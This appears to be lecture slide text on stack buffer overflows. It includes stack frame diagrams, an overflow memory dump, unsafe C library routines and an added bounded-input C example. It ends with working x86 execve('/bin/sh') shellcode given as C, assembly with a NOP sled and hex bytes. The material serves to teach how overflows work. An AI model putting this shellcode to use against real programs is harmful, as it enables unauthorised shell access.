When one function calls another it needs somewhere to


When one function calls another, it needs somewhere to save the return address. It also needs locations to save the parameters to be passed in to the called function, and possibly to save register values.

[Figure 10.3 Example Stack Frame with Functions P and Q. Diagram labels: P: Return Addr, Old Frame Pointer, param 2, param 1; Q: Return Addr in P, Old Frame Pointer, local 1, local 2; Frame Pointer and Stack Pointer are marked.]

[Figure 10.4 Program Loading into Process Memory. Diagram labels: Program File (Program Machine Code, Global Data); Process image in main memory, between Top of Memory and Bottom of Memory (Kernel Code and Data, Stack, Spare Memory, Heap, Global Data, Program Machine Code, Process Control Block).]

Memory Address   Before gets(inp)       After gets(inp)        Contains Value of
. . . .          . . . .                . . . .
bffffbe0         3e850408   > . . .     00850408   . . . .     tag
bffffbdc         f0830408   . . . .     94830408   . . . .     return addr
bffffbd8         e8fbffbf   . . . .     e8ffffbf   . . . .     old base ptr
bffffbd4         60840408   ` . . .     65666768   e f g h
bffffbd0         30561540   0 V . @     61626364   a b c d
bffffbcc         1b840408   . . . .     55565758   U V W X     inp[12-15]
bffffbc8         e8fbffbf   . . . .     51525354   Q R S T     inp[8-11]
bffffbc4         3cfcffbf   < . . .     45464748   E F G H     inp[4-7]
bffffbc0         34fcffbf   4 . . .     41424344   A B C D     inp[0-3]
. . . .          . . . .                . . . .

Figure 10.6 Basic Stack Overflow Stack Values

Table 10.2 Some Common Unsafe C Standard Library Routines

Routine                                         Description
gets(char *str)                                 read line from standard input into str
sprintf(char *str, char *format, ...)           create str according to supplied format and variables
strcat(char *dest, char *src)                   append contents of string src to string dest
strcpy(char *dest, char *src)                   copy contents of string src to string dest
vsprintf(char *str, char *fmt, va_list ap)      create str according to supplied format and variables
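Added example (not part of the original slides): bounded stand-ins for gets(), strcpy(), strcat() and sprintf() from Table 10.2, sized for the 16-byte inp buffer of Figure 10.6, so that an overlong line is rejected instead of overwriting the saved base pointer and return address. The helper names read_line, copy_str and append_str are hypothetical.

```c
#include <stdio.h>
#include <string.h>

/* Added example; helper names are hypothetical, not from the slides. */
#define INP_SIZE 16   /* same size as inp[] in Figure 10.6 */
/* Bounded stand-in for gets(): keeps at most size-1 bytes of one line.
 * Returns 0 if the line fit; -1 if too long (rest dropped) or nothing read. */
int read_line(FILE *in, char *buf, size_t size)
{
    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';          /* strip the newline fgets() keeps */
        return 0;
    }
    int c = fgetc(in);
    if (c == '\n' || c == EOF)
        return 0;                     /* line filled the buffer exactly */
    while (c != '\n' && c != EOF)
        c = fgetc(in);                /* discard the overlong remainder */
    buf[0] = '\0';
    return -1;
}

/* Bounded stand-in for strcpy()/sprintf(): 0 if src fit, -1 if truncated. */
int copy_str(char *dst, size_t size, const char *src)
{
    int n = snprintf(dst, size, "%s", src);
    return (n >= 0 && (size_t)n < size) ? 0 : -1;
}

/* Bounded stand-in for strcat(): size is the full capacity of dst. */
int append_str(char *dst, size_t size, const char *src)
{
    const char *end = memchr(dst, '\0', size);
    if (end == NULL)
        return -1;                    /* dst is not terminated in its buffer */
    size_t used = (size_t)(end - dst);
    return copy_str(dst + used, size - used, src);
}

int main(void)
{
    char inp[INP_SIZE];
    int rc = read_line(stdin, inp, sizeof inp);
    puts(rc == 0 ? inp : "input rejected");
    return rc == 0 ? 0 : 1;
}
```

With the input characters shown in Figure 10.6 (ABCDEFGHQRSTUVWXabcdefgh), read_line returns -1 and nothing beyond inp[15] is written.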
Shellcode
  • Code supplied by attacker
      • Often saved in buffer being overflowed
      • Traditionally transferred control to a user command-line interpreter (shell)
  • Machine code
      • Specific to processor and operating system
      • Traditionally needed good assembly language skills to create
      • More recently a number of sites and tools have been developed that automate this process
  • Metasploit Project
      • Provides useful information to people who perform penetration, IDS signature development, and exploit research

    #include <unistd.h>   /* execve(), NULL */

    int main(int argc, char *argv[])
    {
        char *sh;
        char *args[2];

        sh = "/bin/sh";
        args[0] = sh;
        args[1] = NULL;
        execve(sh, args, NULL);
    }

(a) Desired shellcode in C

          nop
          nop                   // end of nop sled
          jmp  find             // jump to end of code
    cont: pop  %esi             // pop address of sh off stack into %esi
          xor  %eax,%eax        // zero contents of EAX
          mov  %al,0x7(%esi)    // copy zero byte to end of string sh (%esi)
          lea  (%esi),%ebx      // load address of sh (%esi) into %ebx
          mov  %ebx,0x8(%esi)   // save address of sh in args[0] (%esi+8)
          mov  %eax,0xc(%esi)   // copy zero to args[1] (%esi+c)
          mov  $0xb,%al         // copy execve syscall number (11) to AL
          mov  %esi,%ebx        // copy address of sh (%esi) to %ebx
          lea  0x8(%esi),%ecx   // copy address of args (%esi+8) to %ecx
          lea  0xc(%esi),%edx   // copy address of args[1] (%esi+c) to %edx
          int  $0x80            // software interrupt to execute syscall
    find: call cont             // call cont which saves next address on stack
    sh:   .string "/bin/sh "    // string constant
    args: .long 0               // space used for args array
          .long 0               // args[1] and also NULL for env array

(b) Equivalent position-independent x86 assembly code

    90 90 eb 1a 5e 31 c0 88 46 07 8d 1e 89 5e 08 89
    46 0c b0 0b 89 f3 8d 4e 08 8d 56 0c cd 80 e8 e1
    ff ff ff 2f 62 69 6e 2f 73 68 20 20 20 20 20 20

(c) Hexadecimal values for compiled x86 machine code

Figure 10.8 Example UNIX Shellcode
  • Fall '16
  • Randy Fortier
